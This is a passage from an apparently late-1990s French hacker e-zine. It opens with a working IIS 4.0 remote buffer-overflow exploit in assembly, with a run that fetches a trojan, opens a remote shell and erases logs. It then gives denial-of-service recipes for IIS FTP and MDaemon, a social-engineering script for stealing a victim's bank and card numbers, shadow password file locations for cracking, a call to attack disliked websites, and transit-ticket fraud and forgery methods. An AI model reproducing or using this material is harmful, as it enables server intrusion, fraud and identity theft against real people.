041h, 041h, 041h, 041h db 576 dup (041h) db 041h, 041h, 041h, 041h, 041h, 041h, 0b0h, 087h, 067h, 068h, 0b0h, 087h db 067h, 068h, 090h, 090h, 090h, 090h, 058h, 058h, 090h, 033h, 0c0h, 050h db 05bh, 053h, 059h, 08bh, 0deh, 066h, 0b8h, 021h, 002h, 003h, 0d8h, 032h db 0c0h, 0d7h, 02ch, 021h, 088h, 003h, 04bh, 03ch, 0deh, 075h, 0f4h, 043h db 043h, 0bah, 0d0h, 010h, 067h, 068h, 052h, 051h, 053h, 0ffh, 012h, 08bh db 0f0h, 08bh, 0f9h, 0fch, 059h, 0b1h, 006h, 090h, 05ah, 043h, 032h, 0c0h db 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h, 0f4h, 043h, 052h, 051h db 053h, 056h, 0b2h, 054h, 0ffh, 012h, 0abh, 059h, 05ah, 0e2h, 0e6h, 043h db 032h, 0c0h, 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h, 0f4h, 043h db 052h, 053h, 0ffh, 012h, 08bh, 0f0h, 05ah, 033h, 0c9h, 050h, 058h, 0b1h db 005h, 043h, 032h, 0c0h, 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h db 0f4h, 043h, 052h, 051h, 053h, 056h, 0b2h, 054h, 0ffh, 012h, 0abh, 059h db 05ah, 0e2h, 0e6h, 033h, 0c0h, 050h, 040h, 050h, 040h, 050h, 0ffh, 057h db 0f4h, 089h, 047h, 0cch, 033h, 0c0h, 050h, 050h, 0b0h, 002h, 066h, 0abh db 058h, 0b4h, 050h, 066h, 0abh, 058h, 0abh, 0abh, 0abh, 0b1h, 021h, 090h db 066h, 083h, 0c3h, 016h, 08bh, 0f3h, 043h, 032h, 0c0h, 0d7h, 03ah, 0c8h db 075h, 0f8h, 032h, 0c0h, 088h, 003h, 056h, 0ffh, 057h, 0ech, 090h, 066h db 083h, 0efh, 010h, 092h, 08bh, 052h, 00ch, 08bh, 012h, 08bh, 012h, 092h db 08bh, 0d7h, 089h, 042h, 004h, 052h, 06ah, 010h, 052h, 0ffh, 077h, 0cch db 0ffh, 057h, 0f8h, 05ah, 066h, 083h, 0eeh, 008h, 056h, 043h, 08bh, 0f3h db 0fch, 0ach, 084h, 0c0h, 075h, 0fbh, 041h, 04eh, 0c7h, 006h, 08dh, 08ah db 08dh, 08ah, 081h, 036h, 080h, 080h, 080h, 080h, 033h, 0c0h, 050h, 050h db 06ah, 048h, 053h, 0ffh, 077h, 0cch, 0ffh, 057h, 0f0h, 058h, 05bh, 08bh db 0d0h, 066h, 0b8h, 0ffh, 00fh, 050h, 052h, 050h, 052h, 0ffh, 057h, 0e8h db 08bh, 0f0h, 058h, 090h, 090h, 090h, 090h, 050h, 053h, 0ffh, 057h, 0d4h db 08bh, 0e8h, 033h, 0c0h, 05ah, 052h, 050h, 052h, 056h, 0ffh, 077h, 0cch db 0ffh, 057h, 0ech, 080h, 0fch, 0ffh, 074h, 00fh, 050h, 056h, 055h, 0ffh db 057h, 0d8h, 080h, 0fch, 0ffh, 074h, 004h, 085h, 0c0h, 075h, 0dfh, 055h db 0ffh, 057h, 0dch, 033h, 0c0h, 040h, 050h, 053h, 0ffh, 057h, 0e4h, 090h db 090h, 090h, 090h, 0ffh, 06ch, 066h, 073h, 06fh, 066h, 06dh, 054h, 053h db 021h, 080h, 08dh, 084h, 093h, 086h, 082h, 095h, 021h, 080h, 08dh, 098h db 093h, 08ah, 095h, 086h, 021h, 080h, 08dh, 084h, 08dh, 090h, 094h, 086h db 021h, 080h, 08dh, 090h, 091h, 086h, 08fh, 021h, 078h, 08ah, 08fh, 066h db 099h, 086h, 084h, 021h, 068h, 08dh, 090h, 083h, 082h, 08dh, 062h, 08dh db 08dh, 090h, 084h, 021h, 078h, 074h, 070h, 064h, 06ch, 054h, 053h, 021h db 093h, 086h, 084h, 097h, 021h, 094h, 086h, 08fh, 085h, 021h, 094h, 090h db 084h, 08ch, 086h, 095h, 021h, 084h, 090h, 08fh, 08fh, 086h, 084h, 095h db 021h, 088h, 086h, 095h, 089h, 090h, 094h, 095h, 083h, 09ah, 08fh, 082h db 08eh, 086h, 021h, 090h, 098h, 08fh, 04fh, 086h, 099h, 086h, 021h _url2 db 85 dup (021h) db ".htr HTTP/1.0" db 00dh,00ah, 00dh, 00ah logo db "------(IIS 4.0 remote buffer overflow exploit)---------------------------------", 13, 10 db "(c) dark spyrit -- barns@eeye.com.",13,10 db "http://www.eEye.com",13,10,13,10 db "[usage: iishack ]", 13, 10 db "eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe",13,10 db "do not include 'http://' before hosts!",13,10 db "-------------------------------------------------------------------------------", 13, 10, 0 logolen equ $-logo u_length db 10,"No more than 70 chars in 2nd url.",13,10,0 u_lengthl equ $-u_length errorinit db 10,"Error initializing winsock.", 13, 10, 0 errorinitl equ $-errorinit nohost db 10,"No host or IP specified.", 13,10,0 nohostl equ $-nohost noport db 10,"No port specified.",13,10,0 noportl equ $-noport no_url db 10,"No URL specified.",13,10,0 no_urll equ $-no_url urlinv db 10,"Invalid URL.. no file specified?",13,10,0 urlinvl equ $-urlinv reshost db 10,"Error resolving host.",13,10,0 reshostl equ $-reshost sockerr db 10,"Error creating socket.",13,10,0 sockerrl equ $-sockerr ipill db 10,"IP error.",13,10,0 ipilll equ $-ipill porterr db 10,"Invalid port.",13,10,0 porterrl equ $-porterr cnerror db 10,"Error establishing connection.",13,10,0 cnerrorl equ $-cnerror success db 10,"Data sent!",13,10,0 successl equ $-success console_in dd ? console_out dd ? bytes_read dd ? wsadescription_len equ 256 wsasys_status_len equ 128 WSAdata struct wVersion dw ? wHighVersion dw ? szDescription db wsadescription_len+1 dup (?) szSystemStatus db wsasys_status_len+1 dup (?) iMaxSockets dw ? iMaxUdpDg dw ? lpVendorInfo dw ? WSAdata ends sockaddr_in struct sin_family dw ? sin_port dw ? sin_addr dd ? sin_zero db 8 dup (0) sockaddr_in ends wsadata WSAdata sin sockaddr_in sock dd ? numbase dd 10 _port db 256 dup (?) _host db 256 dup (?) _url db 256 dup (?) stuff db 042h, 068h, 066h, 075h, 041h, 050h .code start: call init_console push logolen push offset logo call write_console call GetCommandLineA mov edi, eax mov ecx, -1 xor al, al push edi repnz scasb not ecx pop edi mov al, 20h repnz scasb dec ecx cmp ch, 0ffh jz @@0 test ecx, ecx jnz @@1 @@0: push nohostl push offset nohost call write_console jmp quit3 @@1: mov esi, edi lea edi, _host call parse or ecx, ecx jnz @@2 push noportl push offset noport call write_console jmp quit3 @@2: lea edi, _port call parse or ecx, ecx jnz @@3 push no_urll push offset no_url call write_console jmp quit3 @@3: push ecx lea edi, _url call parse pop ecx cmp ecx, 71 jb length_ok push u_lengthl push offset u_length call write_console jmp quit3 length_ok: mov esi, offset _url mov edi, offset _url2 @@10: xor al, al lodsb cmp al, 02fh jz whaq test al, al jz @@20 add al, 021h stosb jmp @@10 @@20: push urlinvl push offset urlinv call write_console jmp quit3 whaq: push esi lea esi, stuff lodsw stosw lodsd stosd pop esi fileget: xor al, al lodsb test al, al jz getdone add al, 021h stosb jmp fileget getdone: push offset wsadata push 0101h call WSAStartup or eax, eax jz winsock_found push errorinitl push offset errorinit call write_console jmp quit3 winsock_found: xor eax, eax push eax inc eax push eax inc eax push eax call socket cmp eax, -1 jnz socket_ok push sockerrl push offset sockerr call write_console jmp quit2 socket_ok: mov sock, eax mov sin.sin_family, 2 mov esi, offset _port lewp1: xor al, al lodsb test al, al jz go cmp al, 039h ja port_error cmp al, 030h jb port_error jmp lewp1 port_error: push porterrl push offset porterr call write_console jmp quit1 go: mov ebx, offset _port call str2num mov eax, edx push eax call htons mov sin.sin_port, ax mov esi, offset _host lewp: xor al, al lodsb cmp al, 039h ja gethost test al, al jnz lewp push offset _host call inet_addr cmp eax, -1 jnz ip_aight push ipilll push offset ipill call write_console jmp quit1 ip_aight: mov sin.sin_addr, eax jmp continue gethost: push offset _host call gethostbyname test eax, eax jnz gothost push reshostl push offset reshost call write_console jmp quit1 gothost: mov eax, [eax+0ch] mov eax, [eax] mov eax, [eax] mov sin.sin_addr, eax continue: push size sin push offset sin push sock call connect or eax, eax jz connect_ok push cnerrorl push offset cnerror call write_console jmp quit1 connect_ok: xor eax, eax push eax push sploit_length push offset sploit push sock call send push successl push offset success call write_console quit1: push sock call closesocket quit2: call WSACleanup quit3: push 0 call ExitProcess parse proc ;cheap parsing.. hell.. its only an exploit. lewp9: xor eax, eax cld lodsb cmp al, 20h jz done test al, al jz done2 stosb dec ecx jmp lewp9 done: dec ecx done2: ret endp str2num proc push eax ecx edi xor eax, eax xor ecx, ecx xor edx, edx xor edi, edi lewp2: xor al, al xlat test al, al jz end_it sub al, 030h mov cl, al mov eax, edx mul numbase add eax, ecx mov edx, eax inc ebx inc edi cmp edi, 0ah jnz lewp2 end_it: pop edi ecx eax ret endp init_console proc push -10 call GetStdHandle or eax, eax je init_error mov [console_in], eax push -11 call GetStdHandle or eax, eax je init_error mov [console_out], eax ret init_error: push 0 call ExitProcess endp write_console proc text_out:dword, text_len:dword pusha push 0 push offset bytes_read push text_len push text_out push console_out call WriteConsoleA popa ret endp end start …. Et ça marche ……. X:\Code>iishack example.com 80 ourserver.com/ncx.exe ------(IIS 4.0 remote buffer overflow exploit)----------------- (c) dark spyrit -- barns@eeye.com. http://www.eEye.com [usage: iishack ] eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe do not include 'http://' before hosts! --------------------------------------------------------------- Data sent! Note: Give it enough time to download your trojan. X:\Code>telnet example.com 80 Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\>[You have full access to the system, happy browsing :)] C:\>[Add a scheduled task to restart inetinfo in X minutes] C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] C:\>[Clean up any trace or logs we might have left behind.] C:\>exit Voilà …. Fini ce premier p’ti stence …. Même s’il paraît évident que les meilleurs d’entre-vous avaient ,de longue date, déjà utilisé cet exploit. J’ose simplement espérer que cette ‘tite compil aura permis à certains de pénétrer un peu plus le monde enthousiasmant de l’intrusion.. Vous noterez au passage l’existence de l’éxécutable dans l’archive. Ndcedru : Bon j'apporte quelques précisions sur l'exploit il faut que le trojan fasse au maximum 50 ko, c'est pour ca que l'executable (ncx.exe) est bien car il fait que 31ko. Sinon vous avez droit a un flood de la page web, ce qui a pour conséquence que le serveur web est fracassé . Je dis ca parceque j'ai essayé 2 fois et j'ai eu droit a 2 super crash sur 2 sites différents ... C'est la traduction de ce que j'ai trouvé car je comprenais pas pouquoi ca ne marché pas! ;) The exe has also been packed slightly to make it smaller. Instead of a 50k footprint its 31k. So we run our exploit ~DaHLiA~ ================================================================================================ Exploits By Cedru ================================================================================================ Bon voilà je vais vous donner quelques explois pour planter un serveur ou infiltrer un serveur. Donc le premier exploit que je donne en version anglaise permet de planter un pc marchant sous Nt 5.0,win 9x et NT 4.0 (il marche mais pas tout le temps on dirait) J'essayerais de donner de temps en temps des exploits. IIS Remote FTP Exploit/DoS Attack Systems Affected Windows NT 4.0 (SP4) IIS 3.0 / 4.0 Windows 95/98 PWS 1.0 Release Date Sunday, January 24, 1999 Advisory Code IISE01 Description: While feeding in logic into Retina's artificial intelligence engine, which helps construct query strings to pass to internet servers, checking for overflow bugs and miss parsing of command strings. Our test server stopped responding. Below is our findings. Microsoft IIS (Internet Information Server) FTP service contains a buffer overflow in the NLST command. This could be used to DoS a remote machine and in some cases execute code remotely. Lets look at the following example attack. The server must either have anonymous access rights or an attacker must have an account. FTP Session was initiated from an NT Machine. The following Example was tested on Windows NT 5.0 beta 2 ftp client, Windows 9x and NT 4.0 ftp clients will not allow you to overflow the buffer from the command prompt, and you will have to code your own NLST command to perform the buffer overflow. We are waiting for microsoft to release a fix then we will release a program that will demonstrate the DoS. C:\>ftp guilt.xyz.com Connected to guilt.xyz.com. 220 GUILT Microsoft FTP Service (Version 4.0). User (marc.xyz.com:(none)): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 200 PORT command successful. 150 Opening ASCII mode data connection for file list. [The server has now processed our long NLST request and has crashed] -> ftp: get :Connection reset by peer [Our ftp client looses connection... that is a given] The above example uses 316 characters to overflow. This is the smallest possible buffer to pass that will overflow IIS. Lets take a look at the server side happenings. On the server side we have an "Application Error" message for inetinfo.exe. "The instruction at '0x710f8aa2' referenced memory at '0x41414156'. The memory could not be 'read'." If we take a look at our registers we will see the following: EAX = 0000005C EBX = 00000001 ECX = 00D3F978 EDX = 002582DD ESI = 00D3F978 EDI = 00000000 EIP = 710F8AA2 ESP = 00D3F644 EBP = 00D3F9F0 EFL = 00000206 There is no 41 hex (Our overflow character) in any of our registers so we chalk this up as a DoS attack for now. Lets move on and take a look at the largest string we can pass to overflow IIS. C:\>ftp guilt.xyz.com Connected to guilt.xyz.com. 220 GUILT Microsoft FTP Service (Version 4.0). User (marc.xyz.com:(none)): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 200 PORT command successful. 150 Opening ASCII mode data connection for file list. Connection closed by remote host. In this case we passed 505 characters to overflow IIS. This is the largest possible (tested) buffer to pass that will overflow IIS. Lets take a look once again at the server side. On the server we have the same "Application Error" message for inetinfo.exe except this time "The instruction at '0x722c9262' referenced memory at "0x41414141'." This is looking mighty interesting. Lets look at our registers once again: EAX = 00000000 EBX = 41414141 ECX = 41414141 EDX = 722C1CAC ESI = 41414141 EDI = 41414141 EIP = 722C9262 ESP = 00D3F524 EBP = 00D3F63C EFL = 00000246 There sure are a lot of 41 hex codes in our registers now. So to wrap it all up what we have here is a DoS attack against any IISserver with ftp access. Keep in mind we have to be able to login. However, Anonymous access is granted on most servers. Once we have overflowed IIS all IIS services will fail. (I.E. The web service, NNTP, SMTP etc..) What we have seems to be a very interesting buffer overflow. Bon je traduis un peu donc ca consiste a se connecter a un serveur ftp (IIS 3.0 / 4.0 ou pws 1.0) (utilisant windows nt ou 98...) et de balancer la commande ls AAAAAAAAAAAAAAAAAAAAAAAAA (faire le copier coller en haut) et le serveur va faire une erreur qui est : Application Error message for inetinfo.exe ce qui plantera le serveur. Pour savoir si le serveur a bien planté il faut faire : ftp: get :Connection reset by peer Vous allez avoir une réponse comme quoi le serveur n'est pas la.... (j'ai pas le message en tête) Bon voilà un deuxième exploit que je donne encore en anglais avec une petit traduction en francais. L'exploit date du 20 février 1999 (pas très vieux) C'est un buffer overflow pour un serveur marchant avec MDaemon's qui gère le protocole smtp. L'exploit consiste à faire un helo avec 360 caractères pour faire planter le serveur. (voir article de deathlyby 1 de fugitif sur envoyer un email anonyme pour savoir comment se connecter) Je sais pas si il marche! :) MDaemon Remote DoS Attack Systems Affected MDaemon v.2.7 mdsp(5) Description: There is a buffer overflow in MDaemon's SMTP server. The "helo" command will cause MDaemon to crash if aprox. 360 characters are appended to it. If MDaemon is running as a service the service will exit and no messages are displayed on the screen. If MDaemon is run as a background task (default) the typical overflow message is displayed. There is not much to expand on.... just a simple hole we found with Retina while testing. More to come later this week. Vendor Status We contacted the vender a week ago, STILL Waiting for a response... =============================================================================================== Carding By Def BonD =============================================================================================== BY Def BonD FOR DEATHLY BY C'est DEFBOND et j'ai donc décider d'écrire un article à Deathly by... J'espere que Droopy est là pour corriger mes photes d'aurtografe et je le remerci d'avance. Bon, dans un mail je t'avais promis d'écrire un article sur canal plus mais je pense que ce sera pour une prochaine fois. J'ai donc décider de mettre le Nagravision de coté pour parler de Carding (pour ceux que ça interresse pour c+ envoyer moi un mail). Je vais donc vous raconter une histoire vraie que j'ai vécue il y a quelque temps... C'était le soir et je pénétrais dans mon batiment pour rentrer chez moi quand je passe à côté des boites aux lettres...Vous savez ces boites aux lettres où l'ont peu introduire notre petite main tout pleine de doigts...Oui!...Bon je passait donc à côté de ces boites aux lettres quand soudain j'apperçu une facture France Télécom qui dépassait d'une de ces boites... J'ai donc prie cette facture et je suis rentre chez moi tranquillement pour pouvoir la lire à mon aise. Voici les information que l'ont peux y trouver: -Nom, prénom, adresse du destinataire -adresse de l'agence FT -montant de la facture -N° de tel du destinataire (même si il est dur liste rouge), cela correspond au N° de compte se trouvant en haut à droite de la facture -Mais se qui nous interresse, c'est le bas de la facture (dans mon cas, la personne avais opter pour un paiement par prélévement automatique)... Donc au bas de la feuille, on trouve: -Les références du compte (6 caractères) -Le code établissement (16945= caisse d'Epargne) -Le code guichet (5 chiffres) -Et le N° de compte (11 chiffres) Il faut savoir que dans ce cas le numéro de compte n'a rien a voir avec le numéro de carte de retrait. Donc l'idée m'est venu d'appeler la personne et de me faire passer pour l'agence FT afin de collecter les informations tant attendues. Donc voici le dialogue qu'il y a eu:(faite le 3651 avant le numéro de la victime, on sait jamais.Vous pouvez appeller de chez vous et si vous avez un ordinateur taper sur les touches de votre clavier quand il répond à vos questions...ça fera plus réaliste): Bonjours, pius-je parler à Mr xxx. Oui c'est moi même. Bonjours Mr xxx, c'est votre agent FT. Excuser moi de vous déranger mais suite à un probleme lié à notre réseau informatique (nd Moi: inventer un baratin) nous avons perdu des informations sur certain dossiers et nous procédons à une vérification. Pouvez vous vous munir de votre dernière facture s'il vous plait? Heu...oui...Un instant monsieur. **30 secondes plus tard** Oui c'est bon je l'ai sous les yeux. Bien...Vous habiter toujours à ***(l'adresse sur la facture)? Oui c'est cela. Vous êtes bien sur liste rouge (c'était écrit sur sa facture) oui Le montant de votre derniere facture s'élevait bien à ***(le montant de la dernière facture est également inscrit) oui Je vais vous donner des informations sur votre mode de paiement..veuillez m'indiquer si elle ne sont pas erronnées... Je vois que vous avez opté pour un prélévement automatique... (Et la je lui ai sorti son N° de compte et tout les autre codes cités précédement). Oui c'est exacte Mr Bien...Le nom de votre banque s'il vous plait? Caisse d'Epargne Nous aurons aussi besoin de votre numéro de carte de retrait ainsi que la date d'expiration.(nd moi:Quel con!) Un instant s'il vous plait...c'est les xxxx-xxxx-xxxx-xxxx elle expire le xx/xx Bien..et bien merci monsieur, nous avons tout et excuser nous de vous avoir déranger Y a pas de quoi Au fait suite aux nombreux problemes il ce peu que vous ne recevez pas votre facture mais ne vous inquieté pas. D'accord...au revoir..... ET VOILA LE TRAVAIL: Vous avez maintenant son nom, prénom, adresse, N° de tel, nom de la banque, N° de compte, N° de carte... Avec ça vous pouvez commander ce que vous voulez mais ne donner jamais votre adresse à la commande et faites en sorte que ça puisse rentrer dans la boite aux lettres et ne commander jamais deux fois à la même adresse. Dans certains cas, vous pouvez payer par prélévement automatique avec le numéro de compte mais on vous demande la clé de RIB. Il existe de nombreux logiciels permettant de la calculer (voir DEATHLY BY N°5). Dernière chose: Pour les amateurs de Trashing voici un prog uu encoder permettant de vérifier si un numéro de carte est valide, ça s'appelle Credit Wisard et c'est fait par AOHell. Voila, c'est fini et c'était mon premier article...Oui je sais ça manque de technique mais ça sera pour une prochaine fois. Voici mon adresse e-mail: DEBOND069@hotmail.com Je cherche déséspérement: -les plans du video cript 1&2 -Un maître Jedi dans le Haking On peu aussi me retrouver sur le 0800 397 397 bal 8707 0800 900 272 bal 3230 0800 90 36 33 bal 1111 0800 391 391 bal 3694 =============================================================================================== Les devoirs d'un hacker By Crash =============================================================================================== Pour mon 1er article dans cet e-zine (hip hip hip....), on va essayé de s'éloigner des rackages de logiciels et autre piratage de sites du genre NSA ou FBI. Euh! Pourquoi tout le monde part la... Je vais tenter de vous exposer les devoirs réels d'un hacker. On n'arrête pas d'entendre sur le net: "Ouais les hackers se battent pour la liberté etc...". Oui moi je veux bien, mais il y a peut être plus important. Je m'explique: de + en + de sites de pédophiles ou des sites avec avec des doctrines pourries (du genre facho, apologie de l'esclavage.....) pullulent sur le net. Et le pire, c'est que certains sont même légaux (bon pas les sites pédophiles mais y quand même un fn.fr), et moi je peux pas le supporter. Perso, je pense qu'il faudrait fermer ces sites; et qui mieux qu'un hacker en serait capable? Et oui parfois les autorités en sont incapables car: - elles ont mieux à faire --------------- - elles ne les trouvent pas! \ - elles s'en foutent un peu! c'est au choix! - elles sont débordées ------------------/ Il serait donc temps de faire le ménage sur le réseau! Voilà donc ce que je propose: au lieu de hacker une énième fois le réseau du FBI pourquoi ne pas hacker ce genre de sites?(pas tout le temps je vous rassure... on a le droit de s'amuser un peu, non?) Et encore l'autosatisfaction serait plus grande car on aurait le sentiment de bien agir tout en hackant. D'autant plus que de + en + de personnes commmencent à tout mélanger: on mélande de + en + l'underground avec ce genre de site. Un exemple? Je causais avec un gars et je l'ai axé sur le thème des hackers. Bon le gars me répond la même rengaine habituelle en disant que c'est illégal et tout et tout.. Et le voilà qui ajoute: <> Bon c'est vrai qu'on est un peu con, parfois beaucoup, des fois carrément méga con mais certainement pas pédophiles. Ca se passe de commentaire supplémentaire, non? Alors à ceux qui lisent cet article: <> Non seulement le net sera moins pourri mais en plus les gens cesserons de nous mélanger avec ce genre de gars. De +, le hacker pourra retrouver une image de marque dans les médias (oui je sais, on s'en fout un peu)et ça ne fait pas de mal, ouais cool, je me vois bien en zorro du 3ème millénaire! Alors voici pour moi les devoirs d'un hacker (dans l'ordre): 1) protéger le net des salopperies qu'on vu précedemment là où les autorité ne peuvent pas le faire 2) protéger la liberté sur le net 3) niquer Micromerde et Ft Ah au fait, j'ai une idée pourquoi ne pas faire une espèce de liste noire des sites pourries à détruire? Un conseil commmencé par le plus proche de chez vous (par ex fn.fr) =============================================================================================== Les passwords shadows By Crash =============================================================================================== Bon alors là on va parler des fichiers shadows.... k'est-ce ke c'est ke ca? Tout d'abord si vous connaissez le monde Unix, c'est pas la peine de continuer. Je m'adresse plus au newbies. Vous savez certainement que pour ce faire root sur une machine unix, il faut connaître le login et le pass root. Il y a longtemps, quand les root étaient cons, le chier avec le mot de passe était dans le répertoire /etc. Pour les hackers c'était très facile (qui a dit trop?) de pirater la machine car on prenait le fichier et on le donnait à crackjack ( + une bibliotheque de mots) qui essayait tous les mots dans la biliothèque et c'était quasiment gagné! Maintenant commme les root ont réfléchi, ils ont inventé les fichiers shadows. En fait le fichier password ne se trouve plus dans le répertoire /etc mais dans un autre.Mais voila, où trouver ce fameux fichier? Tout d'abord il faudra bien vous rensaigner sur le typee d'os de la machine et ensuite glaner des infos sur la machine pour retrouver le bon fichier. Au fil de mon expérience, des e-mags lus et relus, des sites découverts, j'ai tenté de faire un tableau récapituatif: /==============/==========================================================/ / OS / Répertoire /==============/==========================================================/ / ConvexOS / /etc/shadow (ca c'est con nan?) /==============/==========================================================/ /Linux 1.0 1.1 / /etc/shadow /==============/==========================================================/ /Unicos / /etc/udlb /==============/==========================================================/ /Sun OS 4.1 / /etc/security/passwd.adjunct /==============/==========================================================/ /Sun OS 5.0 / /etc/shadow /==============/==========================================================/ /AIX / /etc/security/passwd(je suis pas sûr de celui là) /==============/==========================================================/ /System 5 / /etc/shadow /==============/==========================================================/ /Bsd4 - reno / /etc/master.passwd /==============/==========================================================/ /Irix / /etc/shadow (je suis pas sûr de celui là) /==============/==========================================================/ /Dg ux / /etc/tcb/aa/user /==============/==========================================================/ /Hp ux / /.secure/etc/passwd /==============/==========================================================/ Une fois le fichier shadow trouvé, vous prenez crackjack et c'est pas plus compliqué que cela! Voila je crois que c'est tout!! Si vous avez d'autres os, mailez-moi!! Au fait, comment savoir si on a un passwd shadows? C'est très simple, vous allez toujours dans le répertoire /etc, vous ouvrez le fichier passwd avec un simple éditeur de texte et si vous voyez un X ou * ou # ça veut dire qu'on a à faire à un fichier shadows. bon ben là, c'est fini! vous pouvez me contacter ici: crashoverflow@hotmail.com =============================================================================================== Les ovni By Roswell =============================================================================================== OOOOOOOOO ................. .......................... .................................. ....... Les ovni par Roswell ........... ................................ ......................... .................. / \ | | _|_ _|_ Bon voila comme y'as deja eu pas mal de sondage dans DB ben on va continuer avec un truc un peut plus marrant ! Je voudrais savoir si qq'un qui lit se mag a deja vu un ovnis et on mettra les resulat dans le DB nr 9 ! Donc voila si vous avez vu ou cru voir un ovnis ou autre chose de bizard ecriver moi a : marc189@caramail.com voila je vous donne rendez vous dans le nr 9 pour le resultat du concours !! !! Fuck diz lamhaz woRlD !! =============================================================================================== Comment niquer les transports en commun Lillois By diabolikk99 =============================================================================================== introduction : Si, comme moi, vous êtes un jeune habitant autours de Lille et que vous étudiez dans cette ville, vous aurez très certainement remarqué que la société qui gére les transports en commun dans les environs (Transpôle) se fout de notre gueule : il y a des réductions pour tout le monde sauf pour nous ! ! ! ! en clair, les patrons de Transpôle pensent que les jeunes sont pleins aux as, et qu’ils vont gentillement leur refiller du pognon à chaque fois qu’ils se verrons contraint d’emprunter un de leurs bus dégueulasses, un de leurs métros qui puent la mort ou un de leurs tramways qui fait gréve une fois sur 2 (attention je reconnais que le droit à la gréve est une avancée sociale considérable et inaliénable, mais j’estime que stopper le boulot n’est pas la meilleure solution... je pense que les dirigeants de Transpôle seraient plus sensible au fait que son personnel fasse voyager gratuitement les clients. Ainsi non seulement leurs patrons se bougeraient le cul plus rapidement pour négocier avec ses employés, et les controleurs gagneraient en popularité...). mais là ils se trompent : les jeunes ne sont pas des trou-du-cul qui aiment se faire mettre (enfin certains, si , quand même un peu...) et ils vont contre-attaquer. Le plan : Alors si toi aussi tu veux rejoindre l’A.D.C.Q.R.D.S.F.A.P.T (Alliance De Ceux Qui Refusent De Se Faire Arnaquer Par Transpôle) voilà la marche à suivre : -1er cas : tu es un demi-rebelle et tout ce que tu veux réussir à obtenir la carte VIVA généreusement refilée par Transpole aux étudiants logeant à Lille... mais toi, tu n’habites pas Lille ! donc y’a un probléme... mais pas de panik, tonton diabolikk est là ! il te suffi de demander à un de tes potes qui habite Lille de te refiler une facture EDF ou France téléconne , tu fait une petite lettre (bien évidemment, en te faisant passer pour les parents du pote en question ) certifiant sur l’honneur que tu es bien hébergé par ton copain à l’adresse figurant sur la facture, tu vas à l’espace carte de transpole, tu leur donne tout ça (+une photo et 10 balles) et ils te donne ta Zoli carte VIVA. Et voilà, Transpole ne te baise plus qu’à 75% (bien ouais : tu as 25% de remise sur les tickets et les abonnements, et 100-25=75...). moi je ne l’ai jamais fait, mais j’ai un copain pour qui ca marche à chaque fois qu’il la renouvelle. -2e cas tu es un vrai rebelle et tu veux tout bonnement ne plus payer tes transport. Alors suit bien ça : tu prends un ticket et tu trouves une borne de compostage ancien modèle, celles qui n’avalent pas complétement les tickets (genre celle du CHR calmette, de la gare Lille Flandre, surtout pas celles des trams parce que là ça marche pas...). ensuite tu introduit ton ticket dans la borne (bien à fonds) et tu le ressorts le plus vite possible. Si tu l’as correctement fait, au lieu d’avoir le n° de la borne, la date et l’heure, tu as un infâme pâté, style un code barre compacté, bref un truc illisible (il faut parfois un peu d’entrainement pour y arriver)... et voilà tu as entre les mains un ticket réutilisable à volonté. J’explique pour les noeud-noeud : tu le garde toujours sur toi et le jour oû tu te fait contrôler, tu le présente aux encul...euh pardon, aux contrôleurs. Ils vont te dire un truc du genre : ‘‘on voit rien sur ton ticket’’ là surtout tu te démonte pas et tu dis ’’c’est pas ma faute si votre putain de saloperie de machine de merde à 2 balles ne marche pas (enfin fais la plus soft que ça, sinon les PD ils vont pas apprécier ,et ils risquent de te faire chier)’’. Pour plus de sécurité garde sur toi un ticket vierge et plusieurs tickets compostés ultérieurement que tu pourra exhiber pour prouver ta bonne foi. Ça fait 1an ½ que j’utilise ce plan et j’ai jamais eû d’emmerdes... -3e cas tu es un fou, un vrai psychopathe que rien n’effraies, un bête mutante, un monstre... faut au moins ça pour ce plan, car si les risques de se faire choper sont minces si vous respectez bien les instructions, si vous vous faites avoir vous êtes dans la merde car ça s’appelles production et usage de faux et au niveau droit pénal c’est assez méchant. Je tiens a précisez que j’ai tenté ce plan une seule fois (pendant une semaine) et puis je l’ai laissé tombé au profit du plan n°2. Assez parler, j’explique le bizzzzznes : Tu achéte un coupon mois(275fr), tu te fait un carte blanche (10fr), tu scannes le coupon mois et tu le retouche avec un logiciel style paint shop pro. Tu effaces le mois, et par un subtil jeu de couper/copier/coller tu recompose le nom du mois suivant, puis celui d’après etc... tu sort le résultat aux bonnes dimension sur du papier cartonner, 